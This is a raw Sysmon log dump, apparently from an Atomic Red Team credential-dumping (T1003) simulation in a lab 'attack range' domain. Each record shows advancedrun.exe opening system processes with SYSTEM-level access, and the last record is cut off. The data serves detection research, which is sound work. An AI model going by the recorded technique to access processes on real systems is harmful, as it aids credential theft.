17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003943773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\At